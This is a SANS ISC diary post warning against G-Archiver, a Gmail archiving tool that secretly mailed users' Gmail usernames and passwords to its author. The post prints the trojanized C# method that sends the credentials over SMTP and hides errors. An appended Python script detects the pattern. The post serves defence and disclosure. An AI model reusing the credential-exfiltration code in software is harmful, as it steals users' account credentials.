SANS ISC: InfoSec Handlers Diary Blog - Don't use G-Archiver

Don't use G-Archiver

Published: 2008-03-12
Last Updated: 2008-03-12 19:26:49 UTC
by Joel Esler (Version: 4)

I saw this article the other day on Coding Horror, and someone (they didn't leave their name) sent it in to us for comment.  Let me just say up front...  there are some aspects of the Coding Horror article that neither we nor I condone or agree with, like deleting all the email and altering the account, etc., instead of contacting law enforcement or Google.  That being said...

The backstory:

G-Archiver (notice I'm not linking to it) is a tool that someone wrote to be able to download all your Google email and archive it locally.  Problem is that the coder who wrote the program decided he'd be slick and put his own username and password in the code.

Whoops.

Yeah, but it wasn't a 'coding mistake'.  He coded it in there, so when someone used this tool, it uploaded YOUR username and password to HIS email account.  (Nice, huh?)

Now, I'll put the code below, but I am going to (out of the kindness of my heart, because I am sure the account is probably canceled at this point) remove this dude's password.  Who knows, he might be using it elsewhere.

 

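Here's the code:

    // Needs the System.Net, System.Net.Mail and System.Text namespaces.
    // a = the user's Gmail username, b = the user's Gmail password.
    public static void CheckConnection(string a, string b)
    {
        try
        {
            // Builds a mail to the author's own (redacted) address...
            MailMessage message = new MailMessage();
            message.To.Add("JTexxxxx@gmail.com");
            message.From = new MailAddress("JTexxxxx@gmail.com", "JTexxx", Encoding.UTF8);
            message.Subject = "Account";
            message.SubjectEncoding = Encoding.UTF8;
            // ...with the user's credentials as the body.
            message.Body = "Username: " + a;
            message.Body = message.Body + "\r\nPassword: " + b;
            message.BodyEncoding = Encoding.UTF8;
            message.IsBodyHtml = false;
            message.Priority = MailPriority.High;
            SmtpClient client = new SmtpClient();
            // The author's own login, hardcoded (password removed here).
            client.Credentials = new NetworkCredential("JTexxxxx@gmail.com", "HIS PASSWORD WAS RIGHT HERE");
            client.Port = 0x24b; // 587 decimal
            client.Host = "smtp.gmail.com";
            client.EnableSsl = true;
            client.Send(message);
        }
        catch (Exception)
        {
            // Empty on purpose: a failed send never shows up to the user.
        }
    }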

Basically, the lesson learned here is, be careful what you install.
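A static triage check for the pattern in the code above, as an added Python example (not part of the original diary or of any tool it mentions): it scans decompiled C# source text for a hardcoded SMTP login, a hardcoded recipient and an empty catch block. The function names and the sample are constructed for illustration, and the regexes are heuristics, not a C# parser.

```python
import re

# Heuristics for what the snippet above does: fixed recipient, fixed SMTP login, hidden errors.
CHECKS = {
    "hardcoded_smtp_credentials": re.compile(
        r'new\s+NetworkCredential\s*\(\s*"[^"]*"\s*,\s*"[^"]*"\s*\)'),
    "hardcoded_recipient": re.compile(r'\.To\.Add\s*\(\s*"[^"]+@[^"]+"\s*\)'),
    "smtp_host": re.compile(r'\.Host\s*=\s*"([^"]+)"'),
    "smtp_port": re.compile(r'\.Port\s*=\s*(0x[0-9a-fA-F]+|\d+)\s*;'),
    "empty_catch": re.compile(r'catch\s*(?:\([^)]*\))?\s*\{\s*\}'),
}

def scan(source):
    """Return {check_name: [line_number, ...]} for decompiled C# source text."""
    findings = {}
    for name, pattern in CHECKS.items():
        for m in pattern.finditer(source):
            findings.setdefault(name, []).append(source.count("\n", 0, m.start()) + 1)
    return findings

def smtp_ports(source):
    """Decode port literals; decompilers often print them in hex (0x24b is 587)."""
    return [int(m.group(1), 0) for m in CHECKS["smtp_port"].finditer(source)]

def needs_review(findings):
    """A fixed login plus a fixed recipient: mail goes to the author, not the user."""
    return {"hardcoded_smtp_credentials", "hardcoded_recipient"} <= set(findings)

# Constructed sample: a shortened copy of the method shown above, address
# redacted as on the page, with a placeholder where the password was.
SAMPLE = '''\
public static void CheckConnection(string a, string b) {
    try {
        MailMessage message = new MailMessage();
        message.To.Add("JTexxxxx@gmail.com");
        SmtpClient client = new SmtpClient();
        client.Credentials = new NetworkCredential("JTexxxxx@gmail.com", "REDACTED");
        client.Port = 0x24b;
        client.Host = "smtp.gmail.com";
        client.Send(message);
    } catch (Exception) { }
}
'''

if __name__ == "__main__":
    report = scan(SAMPLE)
    print(report, smtp_ports(SAMPLE), needs_review(report))
```

A hit only means the file deserves a manual read; code that takes its SMTP login from variables or configuration is not flagged by the credential check.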

So, to the anonymous person that wrote in asking for comment?  Here's my comment:  Don't install it.  Oh yeah, and "John", the coder of this tool...  Shame on you. 

UPDATE:  Someone wrote in and thought it to be a good idea to remove the actual email address. I complied.

Joel Esler

http://www.joelesler.net
